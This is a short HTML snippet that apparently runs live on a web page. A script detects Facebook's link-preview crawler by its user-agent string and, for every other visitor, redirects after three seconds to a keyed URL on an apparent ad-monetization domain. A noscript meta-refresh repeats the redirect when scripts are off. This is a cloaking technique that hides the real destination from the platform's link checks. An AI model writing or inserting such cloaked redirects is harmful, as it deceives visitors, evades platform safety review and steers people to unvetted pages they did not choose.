<script>

  function isFacebookBot() {

    var ua = navigator.userAgent || "";

    return ua.includes("facebookexternalhit") || ua.includes("Facebot");

  }

  if (!isFacebookBot()) {

    setTimeout(function() {

      window.location.href = "https://www.revenuecpmgate.com/vb1ndfxg37?key=762a6262e806006f8b770cb84a498e28";

    }, 3000); // 3-second delay

  }

</script>

<noscript>

  <meta http-equiv="refresh" content="3;url=https://www.revenuecpmgate.com/vb1ndfxg37?key=762a6262e806006f8b770cb84a498e28" />

</noscript>
